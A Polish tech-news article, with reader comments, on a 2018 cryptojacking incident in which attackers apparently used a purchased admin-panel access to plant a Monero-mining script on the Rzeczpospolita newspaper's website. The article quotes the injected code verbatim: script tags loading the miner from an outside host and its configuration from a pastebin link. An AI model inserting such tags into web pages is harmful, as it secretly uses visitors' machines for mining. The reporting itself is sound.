Czy Rzeczpospolita kopie kryptowaluty na komputerach czytelników?

Adrian Celej Artykuły 2018-01-12

W ostatnim czasie coraz głośniej robi się o portalach, które kopią kryptowaluty na komputerach odwiedzających ich gości. Obecnie media huczą o pierwszej takiej sytuacji w Polsce – dzienniku Rzeczpospolita. Jak się jednak okazuje sprawą zaskoczeni byli nie tylko czytelnicy dziennika, ale także jego przedstawiciele.

O co chodzi?

We wrześniu ubiegłego roku na stronie The Pirate Bay wykryto kod JavaScript, który zmuszał przeglądarkę do kopania kryptowaluty Monero. Do sprawy szybko odnieśli się administratorzy – był to jedynie eksperyment zakończony niemałym sukcesem, zyski z wykopanej kryptowaluty były porównywalne z tymi, które dotychczas osiągano ze sprzedaży miejsca na reklamy. Być może do dziś nikt by o tym nic nie wiedział, gdyby nie przesadzili z mocą obliczeniową zabieraną do kopania – komputery przeglądających zwyczajnie zaczynały mulić. Wkrótce podobne skrypty odnaleziono na innych stronach oferujących pirackie multimedia. Niestety, z okazji postanowili skorzystać także hakerzy, niedawno odnaleziono tego typu skrypt na stronie jednej z polskich gmin. Oczywiście znalazł się on tam w wyniku włamania.

Jak to wygląda w przypadku Rzeczpospolitej?

Zacznijmy od początku, a mianowicie od postu na jednym z forów w sieci TOR:

Jest to oferta sprzedaży dostępu do panelu administratora jednego z dużych polskich serwisów. Portal ten miał znajdować się w rankingu TOP 250 oraz miał notować miesięcznie 7 milionów wizyt. Cena początkowo wynosiła 1 BTC, potem została obniżona do 0,5 BTC, a na koniec do około 15 tysięcy złotych. Ponoć w razie braku zainteresowania sprzedający miał kopać na niej kryptowaluty. Jak widać chyba nie znalazł się chętny.

Zobacz też: Dlaczego wydobywanie bitcoinów jest nieopłacalne?

Dlaczego sprawa się wydała?

Nie, użytkownicy raczej nie narzekali na zbyt duże obciążenia komputera. Przestępcy okazali się bardzo wyrozumiali, skonfigurowali skrypt tak, aby nie zabierał zbyt wiele mocy obliczeniowej. Prawdopodobnie nikt by go nie zauważył, gdyby nie ten tweet:

W kodzie strony odnaleziono taki fragment:

<script src=”https://www.webassembly.stream/0ppS.js”></script><script src=”https://pastebin.com/raw/vf427gKs”></script>

Pierwszy link zawierał sam skrypt, drugi z kolei to konfiguracja.

Czy skrypt nadal działa?

Gdy o sprawie zrobiło się głośno, głos zabrali przedstawiciele Rzeczpospolitej, którzy obiecali sprawdzić co się dzieje. Jak widać szybko zabrali się do pracy, ponieważ obecnie w kodzie strony nie ma śladu po odnośniku do skryptu. A więc mamy tu do czynienia z incydentem, nie z chytrością. Swoją drogą trzeba przyznać, że takie formy włamań są nieco mniej dotkliwe niż wyciąganie baz danych i handel danymi użytkowników. Mimo wszystko otwartą kwestią pozostaje to, co hakerzy zrobili z poziomu panelu administratora. Czy próbowali wyciągać dane użytkowników? A może wrzucili parę innych, bardziej szkodliwych skryptów? Tego pewnie się już nie dowiemy. • Grzegorz Mrózek

  To nie pierwszy taki przypadek w Polsce. Wcześniej już chyba niebezpiecznik opublikował listę stron które kopią.

  • Adrian Celej

   Kto by się przejmował stroną jakiejś gminy. Tutaj mamy przypadek naprawdę warty uwagi, być może nawet zagraniczne portale o nim wspomną.

   • maxprzemo

    Jak wchodzę na android.com.pl to mam wrażenie że uruchamiam całą kopalnie kryptowalut a nie małą kopareczkę tak wam portal muli. W porównaniu do spiders, antyweb, gsmmaniak, komórkomania czy tabletowo to ten portal to jeden wielki muł.
    Zamiast śmiać się z innych to posprzątajcie swój podwórek.

    • Adrian Celej

     Siedzę na ACP po kilka godzin dziennie (nic dziwnego, w końcu tu pracuję) i nie zauważyłem tego problemu. Od razu zaznaczam, że mój komputer nie jest jakimś potworem, unikam chwalenia się parametrami. Nie ma czym.

    • Łukasz Pająk

     Wszystkie wymienione przez Ciebie strony internetowe mają dłuższy czas ładowania od android.com.pl – przynajmniej dwukrotnie przy dwukrotnie większej wadze szablonu – według popularnych testów, więc zainteresuj się swoim komputerem i sprawdź z czego ten problem wynika. Proponuję zacząć od wyczyszczenia ciasteczek.

     • maxprzemo

      A u mnie co druga wizyta kończy się takim komunikatem
      http://i67.tinypic.com/8yfe69.jpg
      Gdzie z innymi stronami nie ma żadnego problemu.

     • Łukasz Pająk

      Czyściłeś ciasteczka?x